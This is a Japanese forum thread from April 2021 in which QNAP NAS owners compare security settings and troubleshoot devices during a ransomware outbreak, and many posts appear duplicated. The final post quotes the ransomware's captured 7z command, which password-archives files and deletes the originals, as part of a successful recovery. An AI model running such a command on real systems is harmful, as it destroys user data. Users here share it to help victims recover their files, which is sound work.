ネットワークアクセス保護 「1分間」「5回」「期限なし」
myQNAPcloud 登録済み(アクセス制御は「カスタマイズ済み」だが未稼働。
myQNAPcloud Link 未インストール
VPN利用 OpenVPN
ルータ HG8045Q(NURO)、UPnPは無効
MyDDNS 有効
その他 NAT通過はVPN、P2P等
※サービス関係
QuFirewall(設定厳しめ)+Malware Remover 稼働中
HBS 3 ローカル&クラウドバックアップで利用
media streaming addon 有効
マルチメディアサービス 有効
ssh 無効
OS 4.5.2.1630 build 20210406(5日ほど前にアップデートした)
大体こんなとこ。
■被害=無し
※認証関係
admin 無効
HTTPSのみ有効
P/W それなりに複雑
2段階認証 有効
OpenSSL+証明書インストール済み
※NW関係
NASサービス 公開なし
システムポート 変更済み
ネットワークアクセス保護 「1分間」「5回」「期限なし」
myQNAPcloud 登録済み(アクセス制御は「カスタマイズ済み」だが未稼働。
myQNAPcloud Link 未インストール
VPN利用 OpenVPN
ルータ HG8045Q(NURO)、UPnPは無効
MyDDNS 有効
その他 NAT通過はVPN、P2P等
※サービス関係
QuFirewall(設定厳しめ)+Malware Remover 稼働中
HBS 3 ローカル&クラウドバックアップで利用
media streaming addon 有効
マルチメディアサービス 有効
ssh 無効
OS 4.5.2.1630 build 20210406(5日ほど前にアップデートした)
大体こんなとこ。
166不明なデバイスさん (ワッチョイ d48e-iMGS)
2021/04/23(金) 23:12:37.93ID:Xl8Cu7Hr0 言い方は悪いが、今回のことは紛争地帯にノコノコ出掛けていって誘拐されて助けを求めるのと変わらない。
>>162みたいな論点すり替えの頭の悪いやつが出てくるのも同じ構図。
ここ数年で攻撃する方の手口も複雑になった。
そんなこともわからず、そもそもONUとルーターの違いすらわからんようでは話しにならない。
感染させられたことには同情するけど、危険性を理解した上で使えってこと。
>>162みたいな論点すり替えの頭の悪いやつが出てくるのも同じ構図。
ここ数年で攻撃する方の手口も複雑になった。
そんなこともわからず、そもそもONUとルーターの違いすらわからんようでは話しにならない。
感染させられたことには同情するけど、危険性を理解した上で使えってこと。
167不明なデバイスさん (ワッチョイ 6e49-On6t)
2021/04/23(金) 23:12:43.99ID:U2N+YGbU0 ■被害=無し
※認証関係
admin 有効
パスワード 40桁程度文字(英数字、記号)
2段階認証 なし
※NW関係
myQNAPcloud 登録
myQNAPcloud Link off
公開サービス なし
アクセスコントロール プライベート
VPN
ルータ 10年前のbuffuo無線LANルータ
DDNS ランダム英数字
その他 NAT通過はVPNのみ
※サービス関係
hybrid backup sync ローカルのみ利用
media streaming addon 有効
webサーバ 有効
ssh 有効
OS 4.3.3 build 20180504
※認証関係
admin 有効
パスワード 40桁程度文字(英数字、記号)
2段階認証 なし
※NW関係
myQNAPcloud 登録
myQNAPcloud Link off
公開サービス なし
アクセスコントロール プライベート
VPN
ルータ 10年前のbuffuo無線LANルータ
DDNS ランダム英数字
その他 NAT通過はVPNのみ
※サービス関係
hybrid backup sync ローカルのみ利用
media streaming addon 有効
webサーバ 有効
ssh 有効
OS 4.3.3 build 20180504
168不明なデバイスさん (ワッチョイ d48e-iMGS)
2021/04/23(金) 23:13:48.24ID:Xl8Cu7Hr0169不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/23(金) 23:16:51.95ID:fBx4bygzM170不明なデバイスさん (ワッチョイ e75f-12fG)
2021/04/23(金) 23:18:16.99ID:tjfXkeLE0 とりあえず被害なかった
本体とアプリ更新してadmin無効確認、myqnapcloudをプライベートにしてログインに二段階認証入れた
これでとりあえずかな
本体とアプリ更新してadmin無効確認、myqnapcloudをプライベートにしてログインに二段階認証入れた
これでとりあえずかな
171不明なデバイスさん (ワッチョイ 6e49-On6t)
2021/04/23(金) 23:19:59.86ID:U2N+YGbU0 ■被害=無し
※認証関係
admin 有効
パスワード 40桁程度文字(英数字、記号)
2段階認証 なし
※NW関係
myQNAPcloud 登録
myQNAPcloud Link off
公開サービス なし
アクセスコントロール プライベート
VPN OpenVPN
DDNS myqnapcloud
NAT https, OpenVPN
ルータ/UPnP 有効
NAS/UpnP 有効ただし登録サービスなし
※サービス関係
HBS 3 利用
media streaming addon 無効
QuFirewall 利用
webサーバ 有効
ssh 無効
OS 4.5.2.1630
2か所でNASを設置しているけどUPnPの有効無効以外は同じ。どちらも被害なし。
てっきりoffだと思っていたけど今回の騒ぎで慌てて確認して切った。
おそらくmyQNAPcloudの設定とHBS3の合わせ技でやられたんだろうな
※認証関係
admin 有効
パスワード 40桁程度文字(英数字、記号)
2段階認証 なし
※NW関係
myQNAPcloud 登録
myQNAPcloud Link off
公開サービス なし
アクセスコントロール プライベート
VPN OpenVPN
DDNS myqnapcloud
NAT https, OpenVPN
ルータ/UPnP 有効
NAS/UpnP 有効ただし登録サービスなし
※サービス関係
HBS 3 利用
media streaming addon 無効
QuFirewall 利用
webサーバ 有効
ssh 無効
OS 4.5.2.1630
2か所でNASを設置しているけどUPnPの有効無効以外は同じ。どちらも被害なし。
てっきりoffだと思っていたけど今回の騒ぎで慌てて確認して切った。
おそらくmyQNAPcloudの設定とHBS3の合わせ技でやられたんだろうな
172不明なデバイスさん (ブーイモ MM5e-60kV)
2021/04/23(金) 23:21:34.52ID:cuiWrKY6M HGWと呼ばれるブツのことなのはたぶんみんなわかってる
173不明なデバイスさん (ワッチョイ d48e-iMGS)
2021/04/23(金) 23:22:13.27ID:Xl8Cu7Hr0 >>169
後付けの言い訳やめろよ
ONUはONU。ルーターはルーター。
NTTには単体のONUとか単体のルーターがないとでもいうのか?
書くならONU内蔵のルーター、型番○○だ。
だから頭が悪いと指摘している。
後付けの言い訳やめろよ
ONUはONU。ルーターはルーター。
NTTには単体のONUとか単体のルーターがないとでもいうのか?
書くならONU内蔵のルーター、型番○○だ。
だから頭が悪いと指摘している。
174不明なデバイスさん (ワッチョイ 245f-On6t)
2021/04/23(金) 23:22:27.55ID:V3nnq0VN0175不明なデバイスさん (ワッチョイ 9c4f-Nexr)
2021/04/23(金) 23:24:03.53ID:TvZqdhvH0 もう諦めて凄腕ハッカーが攻撃して暗号キーを公開してくれるの待つことにする
176不明なデバイスさん (ワッチョイ d8f9-zdG1)
2021/04/23(金) 23:25:01.67ID:R6Ruho+20 一昨日NASがハード的に死んだんで
新しいのを買おうと最新情報仕入れに来たら
えらいことになってんのね
まさか俺のもやられてるのかしら…
新しいのを買おうと最新情報仕入れに来たら
えらいことになってんのね
まさか俺のもやられてるのかしら…
178不明なデバイスさん (ワッチョイ a45f-yH17)
2021/04/23(金) 23:34:21.16ID:PngjUEy80 参考にならんかもだけど
共通
admin無効、管理者20桁パスワード、2段階認証有効
ポート・NAT openVPNの1ポートのみ
3月末 malware発見
機種 TS-220
QTS 4.3.x
HBS(旧版?)
myQnapCloud 利用、公開
uPnP on
QuFirewall なし
現在 被害なし
機種 TS-253D
QTS 4.5.2
HBS 3
myQnapCloud off、非公開
uPnP off
QuFirewall 最高設定
共通
admin無効、管理者20桁パスワード、2段階認証有効
ポート・NAT openVPNの1ポートのみ
3月末 malware発見
機種 TS-220
QTS 4.3.x
HBS(旧版?)
myQnapCloud 利用、公開
uPnP on
QuFirewall なし
現在 被害なし
機種 TS-253D
QTS 4.5.2
HBS 3
myQnapCloud off、非公開
uPnP off
QuFirewall 最高設定
179不明なデバイスさん (ワッチョイ 4259-o8NC)
2021/04/23(金) 23:35:50.19ID:gJPKi2eM0180不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/23(金) 23:40:06.77ID:fBx4bygzM181不明なデバイスさん (ワッチョイ d48e-iMGS)
2021/04/23(金) 23:59:31.84ID:Xl8Cu7Hr0182不明なデバイスさん (ワッチョイ ba7c-xYSY)
2021/04/24(土) 00:01:15.15ID:mYAQySOO0 どうでもいいことにこだわってスレを荒らすなよアスペかよ
183不明なデバイスさん (ワッチョイ 8b10-Cx3h)
2021/04/24(土) 00:04:56.38ID:4uFl3/ie0 余ってるqnapを再構築してノーガード公開したら楽しそうだけどHBSは最新版になっちゃうか
184不明なデバイスさん (ワッチョイ 245f-jaYo)
2021/04/24(土) 00:06:56.88ID:BZr/HOSu0 >>175
わかった。ちょっと待ってろ。
わかった。ちょっと待ってろ。
185不明なデバイスさん (ワッチョイ d205-Iq6q)
2021/04/24(土) 00:09:20.95ID:T8vFlTn90 14へ行け カラ上げ小僧
186不明なデバイスさん (ワントンキン MM3b-COaZ)
2021/04/24(土) 00:14:25.09ID:haC/N4eMM ここまで読んだ限り侵入されたのは馬鹿ばっか
これでOK?
これでOK?
187不明なデバイスさん (ワッチョイ d2b1-LHSg)
2021/04/24(土) 00:14:41.67ID:hWZUKHrd0 はい
189不明なデバイスさん (ワッチョイ 8a3d-2tiM)
2021/04/24(土) 00:53:24.63ID:nUPLoS7i0 1時間くらいmyqnapcloudでパブリックにして放置してみたけど特にアタックなかったな。
ちなみにomankoっていうidは空いてたぞ。
ただし人柱にしたポンコツQTSは4.2.6だったからHBS3は載ってない。
ちなみにomankoっていうidは空いてたぞ。
ただし人柱にしたポンコツQTSは4.2.6だったからHBS3は載ってない。
190不明なデバイスさん (ワッチョイ 2d07-sKTo)
2021/04/24(土) 01:06:40.95ID:IftYqCur0 431Kでポートトランキングを設定して、スマホからは繋がるのにPCからは繋がらないんだけど、何かPCで設定いる?
ルータはNETGEARのRAX80で、ルータの設定画面上ではリンクアグリゲーションとして認識してる
Windows10の資格情報は書き換えた
ルータはNETGEARのRAX80で、ルータの設定画面上ではリンクアグリゲーションとして認識してる
Windows10の資格情報は書き換えた
191不明なデバイスさん (ワッチョイ 2d07-sKTo)
2021/04/24(土) 01:09:28.62ID:IftYqCur0 ちなみにNASの再起動後一瞬だけ接続できる
192不明なデバイスさん (ワッチョイ ae63-1Uyt)
2021/04/24(土) 01:39:47.01ID:C6zw1deW0 NASに被害受けてなくても頭に致命的なダメージ負ってる奴がいてワロタ
アスペでも生きていけるから頑張れ(´・ω・`)
アスペでも生きていけるから頑張れ(´・ω・`)
193不明なデバイスさん (ワッチョイ 4652-zvOL)
2021/04/24(土) 01:47:16.76ID:Ev7PpdJu0 >>190
繋がるというかネットワークとして疎通できるか、ARPテーブルとかも確認してみるとか。
繋がるというかネットワークとして疎通できるか、ARPテーブルとかも確認してみるとか。
194不明なデバイスさん (ワッチョイ 9b5f-2tiM)
2021/04/24(土) 01:57:32.35ID:wewlGYRe0 iPhoneからopenvpnがどうしてもつながらない。
妙なこだわりはないからこれやれば鉄板っていう設定を教えて欲しい。
妙なこだわりはないからこれやれば鉄板っていう設定を教えて欲しい。
195不明なデバイスさん (ワッチョイ a45f-yH17)
2021/04/24(土) 02:06:50.75ID:YaHK2aCH0 今回の攻撃で暗号化されるのはどの範囲までなんだろう?
自分で作成した共有フォルダ下や外付けドライブまで暗号化されるんだろうか。
自分で作成した共有フォルダ下や外付けドライブまで暗号化されるんだろうか。
196不明なデバイスさん (アウアウエー Sa6a-Bx8s)
2021/04/24(土) 02:16:47.86ID:DEubrLMaa よくわからんが被害は受けてないな
adminユーザは無効にしてるがそれ以外はデフォルトでセキュリティは高くないはず。
myqnap登録ありで公開サービスもある。
数週間前のadminアタックも受けてた。
ただ日本時間23時から9時までは電源落としてる
adminユーザは無効にしてるがそれ以外はデフォルトでセキュリティは高くないはず。
myqnap登録ありで公開サービスもある。
数週間前のadminアタックも受けてた。
ただ日本時間23時から9時までは電源落としてる
197不明なデバイスさん (ワッチョイ 2e32-zdG1)
2021/04/24(土) 06:18:01.59ID:oDEb9on50 >>194
ユーザにopenvpn許可してる?
ユーザにopenvpn許可してる?
198不明なデバイスさん (ワッチョイ 2e32-zdG1)
2021/04/24(土) 06:18:55.62ID:oDEb9on50 >>195
外付けのhddには被害なしだった
外付けのhddには被害なしだった
199不明なデバイスさん (ワッチョイ 2e32-zdG1)
2021/04/24(土) 06:22:02.65ID:oDEb9on50 21日のqnap講習会参加したけど、メーカ曰くmedia centerと hybrid backupの公開が原因だとのこと
200不明なデバイスさん (ワッチョイ 2e32-zdG1)
2021/04/24(土) 06:24:11.66ID:oDEb9on50 個人的にはFire wall入れて海外からのip弾けばかなり有効と思ってる
201不明なデバイスさん (ワッチョイ 9c4f-Nexr)
2021/04/24(土) 07:18:07.45ID:qdLycDqk0 ttps://www.youtube.com/watch?v=aq_cIdY_ksQ
誰か一人でもこれで救われることを祈る
誰か一人でもこれで救われることを祈る
202不明なデバイスさん (ワッチョイ 3f2d-H1Bl)
2021/04/24(土) 07:18:27.04ID:pwYAmpIH0 定期的にPPPoEセッションなり接続と切断を繰り返し、長期間そのIPアドレスに留まらないのも有効な方法じゃないのかなと思っている。
203不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/24(土) 08:24:21.73ID:XUFJeDBeM 今回の巻き添えを食ったGoogle Driveの履歴見ると、同じ圧縮・暗号化のタイミングでフォルダ内のファイル名をランダムかつ相互にシャッフルしているみたい。
204不明なデバイスさん (ワッチョイ b6b7-msKI)
2021/04/24(土) 08:27:47.18ID:YgUTBYR00 QuFirewallでアクセス拒否されたIPアドレスや試行した内容を表示させられますか?
Denied access reached the limitとかいう報告は来るけど具体的な内容が見れなくてモヤモヤしてます。
Denied access reached the limitとかいう報告は来るけど具体的な内容が見れなくてモヤモヤしてます。
205不明なデバイスさん (テテンテンテン MM34-e7D1)
2021/04/24(土) 08:51:17.97ID:8B7ne3KSM ログ取る設定にしとけば見られるかと
206不明なデバイスさん (ワッチョイ 2cbd-tgKQ)
2021/04/24(土) 09:10:37.53ID:x/hwhZRB0 >>200
みんな詳しくセキュリティの設定情報を教えてくれてるけど、海外を弾くはしてたのかな?
自分は難しい事はよくわからないけど、ここ最近のadmin攻撃の流れでadmin無効化と海外を弾くのだけしておいたけど、多分大丈夫そう。
外から繋げなくするのが1番なんだろうけどね。
(外から繋ぎたいのって、雷の時に電源落とすのと、旅行中にエロ動画見るかな位だけどw)
みんな詳しくセキュリティの設定情報を教えてくれてるけど、海外を弾くはしてたのかな?
自分は難しい事はよくわからないけど、ここ最近のadmin攻撃の流れでadmin無効化と海外を弾くのだけしておいたけど、多分大丈夫そう。
外から繋げなくするのが1番なんだろうけどね。
(外から繋ぎたいのって、雷の時に電源落とすのと、旅行中にエロ動画見るかな位だけどw)
207不明なデバイスさん (ワッチョイ 2d07-sKTo)
2021/04/24(土) 10:22:34.92ID:IftYqCur0208不明なデバイスさん (ワッチョイ 9b5f-bzv4)
2021/04/24(土) 10:28:19.04ID:mXbYsjo90 ■被害=無し
※認証関係
admin 無効
パスワード 20文字(大小数字)
2段階認証 使ってない
※NW関係
myqnapcloud 稼働 (本人のみでON / UPNP OFF)
VPN利用 なし
ルータ buffallo WSR-5400AX6 (UPNP OFF / ポート開放なし / v6プラス)
DDNS myqnapcloud
その他 ポート 全てデフォルト
※サービス関係
QuFirewall(Basic)+Malware Remover 稼働中
HBS3 ローカルのみ利用
media streaming addon 有効
マルチメディアサービス 有効
Qsync系 無効
webサーバ 有効
FTPサーバ 有効
ssh 有効
OS 4.5.2 build 20210302
ちょっと前のAdminアタックが話題になってた時v6プラスのせいか全然影響無かったんで
myqnapcloudオンにしてポートも全部デフォに戻してたんだよね
数日前からqFireWallでの遮断ログ増えてたから一瞬肝が冷えたわ
とりあえず myqnapcloudとマルチメディア系とSSH無効にしてQTSの8080ポート変えて外付けUSBのケーブル外して様子見
※認証関係
admin 無効
パスワード 20文字(大小数字)
2段階認証 使ってない
※NW関係
myqnapcloud 稼働 (本人のみでON / UPNP OFF)
VPN利用 なし
ルータ buffallo WSR-5400AX6 (UPNP OFF / ポート開放なし / v6プラス)
DDNS myqnapcloud
その他 ポート 全てデフォルト
※サービス関係
QuFirewall(Basic)+Malware Remover 稼働中
HBS3 ローカルのみ利用
media streaming addon 有効
マルチメディアサービス 有効
Qsync系 無効
webサーバ 有効
FTPサーバ 有効
ssh 有効
OS 4.5.2 build 20210302
ちょっと前のAdminアタックが話題になってた時v6プラスのせいか全然影響無かったんで
myqnapcloudオンにしてポートも全部デフォに戻してたんだよね
数日前からqFireWallでの遮断ログ増えてたから一瞬肝が冷えたわ
とりあえず myqnapcloudとマルチメディア系とSSH無効にしてQTSの8080ポート変えて外付けUSBのケーブル外して様子見
209不明なデバイスさん (ワッチョイ 9b5f-2tiM)
2021/04/24(土) 10:36:36.73ID:wewlGYRe0 >>197
してる。
qnap管理画面からovpnファイルとca.certを落としてutf-8のままovpnのcaディレクティブに埋め込んで1ファイルに。
openvpnのアプリに取りこんで接続するとタイムアウトになる。
ルータを疑って同一セグメント内からipアドレスを入れてもダメ。
QNAP側にはログイン試行のログも出ない。
L2TPは繋がる。
udp1194じゃなくてtcpに変えてみるか。。。
してる。
qnap管理画面からovpnファイルとca.certを落としてutf-8のままovpnのcaディレクティブに埋め込んで1ファイルに。
openvpnのアプリに取りこんで接続するとタイムアウトになる。
ルータを疑って同一セグメント内からipアドレスを入れてもダメ。
QNAP側にはログイン試行のログも出ない。
L2TPは繋がる。
udp1194じゃなくてtcpに変えてみるか。。。
210不明なデバイスさん (ワッチョイ 5c88-wULo)
2021/04/24(土) 11:17:57.53ID:3QdN6HK50 流れぶった切ってすいません。
TS653D使用、2.5Gbeで有線LAN接続したいPCが1台の場合は、LANポート1つはルーターに(無線で共有する用)、もう1つはPCと直接繋いでローカルアドレスを割り当てて使う方法は大丈夫なものでしょうか?
2.5Gbeハブ経由で使っていたのですが、よく考えれば2.5GbeがほしいのはメインPC1台だけだったので、それならば直接NASとPCを繋いだほうが安定すると思ったので質問しました。
宜しくおねがいします。
TS653D使用、2.5Gbeで有線LAN接続したいPCが1台の場合は、LANポート1つはルーターに(無線で共有する用)、もう1つはPCと直接繋いでローカルアドレスを割り当てて使う方法は大丈夫なものでしょうか?
2.5Gbeハブ経由で使っていたのですが、よく考えれば2.5GbeがほしいのはメインPC1台だけだったので、それならば直接NASとPCを繋いだほうが安定すると思ったので質問しました。
宜しくおねがいします。
211不明なデバイスさん (ワッチョイ df36-Rk3w)
2021/04/24(土) 11:28:25.79ID:qwe4jpGu0213不明なデバイスさん (ワッチョイ 6fa0-b+U1)
2021/04/24(土) 13:48:56.80ID:VdEvlpRk0 snapshotマジで意味無いな
214不明なデバイスさん (ワッチョイ ae81-On6t)
2021/04/24(土) 13:50:38.01ID:slSTqQaq0 今回のランサム騒ぎ、日本だけってことなないよね。
世界中のQNAPユーザーが被害にあってるんじゃないのか。
世界中のQNAPユーザーが被害にあってるんじゃないのか。
215不明なデバイスさん (ワッチョイ 4259-o8NC)
2021/04/24(土) 13:53:35.39ID:bPPtmwtb0 ASUSTORに移るかSynologyに移るか考えてる
216不明なデバイスさん (ブーイモ MM5e-Rk3w)
2021/04/24(土) 13:55:13.72ID:3YHfxMVnM 世界中です。
217不明なデバイスさん (ブーイモ MM5e-Rk3w)
2021/04/24(土) 13:57:37.89ID:3YHfxMVnM >>210
ルータとPCにつけるIPアドレスは別々のネットワークにするべきだと思う
ルータとPCにつけるIPアドレスは別々のネットワークにするべきだと思う
218不明なデバイスさん (ワッチョイ 56ca-fFN0)
2021/04/24(土) 14:12:58.54ID:76fR32gQ0 シノは絶賛機能削除中である意味祭り。
PhotoStationがなくなったとか
PhotoStationがなくなったとか
219不明なデバイスさん (ワッチョイ fb6e-BqgI)
2021/04/24(土) 14:45:45.58ID:Z6hujAJw0 今回どーにもならなくて金払うとなるとおいくら万円?
220不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/24(土) 14:50:20.54ID:VKqo0QpV0221不明なデバイスさん (ワッチョイ fb6e-BqgI)
2021/04/24(土) 15:06:18.22ID:Z6hujAJw0 むーこれまた諦めがつくか付かないかの微妙な額だな
222不明なデバイスさん (スッップ Sd70-qRZI)
2021/04/24(土) 15:09:03.45ID:5J8fP7VYd 金払ったからって復号できる保証はないぞwww
223不明なデバイスさん (テテンテンテン MM34-udT0)
2021/04/24(土) 15:20:12.60ID:vyXleQdfM224不明なデバイスさん (ワッチョイ a45f-yH17)
2021/04/24(土) 17:56:44.35ID:YaHK2aCH0 >>198
そっか。じゃあ外付けにバックアップし取ってた人は何とか出来たのか。
そっか。じゃあ外付けにバックアップし取ってた人は何とか出来たのか。
225不明なデバイスさん (ワッチョイ 5c88-wULo)
2021/04/24(土) 17:59:16.15ID:3QdN6HK50226不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/24(土) 18:33:07.28ID:qwe4jpGu0 >>225
ルーターに接続するNICのIPアドレスは192.168.1.0/24のネットワークで
直結するNICのIPアドレスは192.168.2.0/24のネットワークで
みたいな感じで
NASに付けるIPアドレスは固定した方がいいと思うよ
ルーターに接続するNICのIPアドレスは192.168.1.0/24のネットワークで
直結するNICのIPアドレスは192.168.2.0/24のネットワークで
みたいな感じで
NASに付けるIPアドレスは固定した方がいいと思うよ
227不明なデバイスさん (ワッチョイ 9b5f-2tiM)
2021/04/24(土) 19:09:47.10ID:wewlGYRe0 普通は古ーい機種を使ってた人が馬鹿を見るってパターンが多いけど今回はHBS3が対応してない世代の人たちはセーフか。
228不明なデバイスさん (ワッチョイ b692-0PTu)
2021/04/24(土) 19:38:52.13ID:Q5y4EusE0 仕事から帰って253pro見たら電源ランプが赤。
ヤられたと思ったらウィルススキャンの負荷??でドライブが外れたみたい。
再起動したら治ったから良しとしよう。
ヤられたと思ったらウィルススキャンの負荷??でドライブが外れたみたい。
再起動したら治ったから良しとしよう。
229不明なデバイスさん (ブーイモ MM5e-5CYL)
2021/04/24(土) 19:41:43.79ID:XUFJeDBeM 今回犯人はこれで幾ら儲けるんだろう
230不明なデバイスさん (ワッチョイ 9610-3cD6)
2021/04/24(土) 19:45:34.84ID:BRMALEqq0 久々にきたらやばいことになっててビックリ
ルータ買い替え後設定ほったらかしてたおかげで、外からろくに繋がらない状態だったせいか被害は無かった
QuFirewallの存在を知ったのでインストールしといた
ルータ買い替え後設定ほったらかしてたおかげで、外からろくに繋がらない状態だったせいか被害は無かった
QuFirewallの存在を知ったのでインストールしといた
231不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/24(土) 20:05:33.00ID:VKqo0QpV0232不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 20:21:28.21ID:BWPFtHJr0 ts-431pで被害に会いまして、とりあえず再起動してはいけないとのことですが、
ポート変更はしておこうと思い、ポートを変更したら
ブラウザからアクセスできなくなってしまったのですが
なにか原因わかる方いらっしゃいます?
いままでやったことなかったですがSSHもだめでした。
ポート変更はしておこうと思い、ポートを変更したら
ブラウザからアクセスできなくなってしまったのですが
なにか原因わかる方いらっしゃいます?
いままでやったことなかったですがSSHもだめでした。
235不明なデバイスさん (ワッチョイ 06cb-vaez)
2021/04/24(土) 20:32:52.28ID:Upi3JGyE0 ブラウザのURLの後ろに:8080みたいに変更したポート追記すればいけるんちゃう?
236不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/24(土) 20:35:33.33ID:qwe4jpGu0 >>232
最初にやるべきことはポート変更ではなく
Malware Removerの最新版をインストールしてスキャン実行して
/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log
が作成されるかsshで確認
最初にやるべきことはポート変更ではなく
Malware Removerの最新版をインストールしてスキャン実行して
/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log
が作成されるかsshで確認
237不明なデバイスさん (ワッチョイ ae81-On6t)
2021/04/24(土) 20:36:12.36ID:slSTqQaq0238不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/24(土) 20:39:55.98ID:qwe4jpGu0 ちなみに最新版のWaterfoxではプロトコルのデフォルト以外のポート番号を指定すると
このアドレスへの接続は制限されています
と言うエラーが出て接続できないというバグが発生中
このアドレスへの接続は制限されています
と言うエラーが出て接続できないというバグが発生中
239不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 20:42:47.67ID:BWPFtHJr0 232です。
普段から末に:8080つけてたんでそれを変更後:1234(例)みたいな感じに変えたんですがだめという状態でした。
chromeとedgeは少なくともだめでした。
普段から末に:8080つけてたんでそれを変更後:1234(例)みたいな感じに変えたんですがだめという状態でした。
chromeとedgeは少なくともだめでした。
240不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 20:47:58.51ID:BWPFtHJr0 追記でMalware Removerは1日1回自動で実行しており、この騒ぎのあとも一回手動で動作させました。
241不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/24(土) 21:05:31.36ID:VKqo0QpV0 管理画面のポート(システムポート)を8080から1234(例)に変えて
LAN内から 192.168.1.100:1234(例) で管理画面が出ないようわーん、で合ってるのかな?
それともWAN側から接続できないお話?
LAN内から 192.168.1.100:1234(例) で管理画面が出ないようわーん、で合ってるのかな?
それともWAN側から接続できないお話?
242不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 21:07:11.41ID:BWPFtHJr0 >>241
あってます。DDNSを使ってるのでそれでWANからでも同様です。
あってます。DDNSを使ってるのでそれでWANからでも同様です。
243不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/24(土) 21:09:34.68ID:VKqo0QpV0244不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 21:18:11.26ID:BWPFtHJr0 >>243
そっちは変えてないですがうまく行かないです。
admin設定変更初期化のリセットボタン3秒はtmpファイル消えないですかね?
一応少なくとも一回以上Malware Removerは実行できてるのですが7zパスワードとかはそれで拾えてたりするのでしょうか。
そっちは変えてないですがうまく行かないです。
admin設定変更初期化のリセットボタン3秒はtmpファイル消えないですかね?
一応少なくとも一回以上Malware Removerは実行できてるのですが7zパスワードとかはそれで拾えてたりするのでしょうか。
245不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/24(土) 21:24:20.51ID:u6AD13WY0 SSHでのファイル確認ってcd で1つずつ移動していくしかないのですか?
階層を順番に移動する方法はありませんか?
階層を順番に移動する方法はありませんか?
246不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/24(土) 21:26:01.65ID:VKqo0QpV0247不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 21:29:05.04ID:BWPFtHJr0249不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/24(土) 21:36:26.07ID:VKqo0QpV0 >>247
SSH拒否は接続自体を拒否られるほう(Connection refused/reset)なのか
接続できるけどログインできないほうなのかどっちでしょう?
無効なadminでログインしようとしてるとかでもないのかな
SSH拒否は接続自体を拒否られるほう(Connection refused/reset)なのか
接続できるけどログインできないほうなのかどっちでしょう?
無効なadminでログインしようとしてるとかでもないのかな
250不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 21:39:56.71ID:BWPFtHJr0 >>249
connection refusedですね。teratarmとputty、LAN、WANすべての組み合わせでだめでした。
connection refusedですね。teratarmとputty、LAN、WANすべての組み合わせでだめでした。
251不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 21:41:21.61ID:BWPFtHJr0 >>250の追記です。
ただしSSHに関しては当方素人ですので使い方が悪いかもしれないです。
ただしSSHに関しては当方素人ですので使い方が悪いかもしれないです。
253不明なデバイスさん (ワッチョイ 9610-3cD6)
2021/04/24(土) 22:18:50.49ID:BRMALEqq0254不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 22:25:22.09ID:BWPFtHJr0255不明なデバイスさん (ワントンキン MM0e-12fG)
2021/04/24(土) 22:34:12.48ID:M6NvMEeVM qfinderから管理画面に行くと、設定変更したポートに自動で付け替えてブラウザで開いてくれたっけ? あんまり意識したことないな
256不明なデバイスさん (ワッチョイ 9610-3cD6)
2021/04/24(土) 22:40:46.56ID:BRMALEqq0257不明なデバイスさん (ワッチョイ 09a5-Nexr)
2021/04/24(土) 22:52:33.38ID:BWPFtHJr0 皆さんいろいろありがとうございます。
adminリセットしようと思います。
また報告に来ます
adminリセットしようと思います。
また報告に来ます
258不明なデバイスさん (ワッチョイ 9b5f-JIv2)
2021/04/24(土) 23:03:41.32ID:mXbYsjo90 まて
とりあえずqfinderを試してみるんだ
とりあえずqfinderを試してみるんだ
259不明なデバイスさん (オイコラミネオ MM71-tGwo)
2021/04/24(土) 23:10:39.56ID:eJE9pVpcM 3月に思い立って外部接続切る設定にしたんだよな
あのとき侵入しようとしてきたオジサンありがとう
あのとき侵入しようとしてきたオジサンありがとう
260不明なデバイスさん (ワッチョイ 2e9f-abm2)
2021/04/25(日) 00:03:57.33ID:F5U07W8M0 >236
すみません。今朝、malware remover で例のランサムウェア削除してくれて
そのあとNAS再起動しましたが
今 SSHでつないだら 7z.log ありました。
そして中身を見ると 文字化け?状態でしたが
パスワード有りました!!
こういった感じでありまして >84番さんの書き込みで32文字とあったので
"-pOffbS4U3mIxf9s1D01HHtexr6jjCSHWm" がパスワードぽく見えたので
けつから32桁数えて -pのあとから最後までコピペして解凍したらいけました!!
ほんと鳥肌たちました!!ありがとうございます!
さらにセキュリティーの教訓になりました。
これを機にもっと勉強します。
ほんとありがとうございました!!
/proc/23324:/usr/local/sbin/7z.orig "a" "-mx=0" "-sdel"
"-pOffbS4U3mIxf9s1D01HHtexr6jjCSHWm"
"/share/CACHEDEV1_DATA/share/缺P~D筐C~P筐C~C筐B・
~B≪~C~C筐C~W/大聿[2;1H畿罕~X-筝~J綏~]筝~J 190530/
Public/Music/Sony MediaPlayerX/Shared/Music/DisnB≪~C~
J筐A・~[・~A・コ苙N~K 筐B・~C・~B吾~C~J筐C・~C祉~B
泣~B・~C潟~C~I筐C~H筐C・
すみません。今朝、malware remover で例のランサムウェア削除してくれて
そのあとNAS再起動しましたが
今 SSHでつないだら 7z.log ありました。
そして中身を見ると 文字化け?状態でしたが
パスワード有りました!!
こういった感じでありまして >84番さんの書き込みで32文字とあったので
"-pOffbS4U3mIxf9s1D01HHtexr6jjCSHWm" がパスワードぽく見えたので
けつから32桁数えて -pのあとから最後までコピペして解凍したらいけました!!
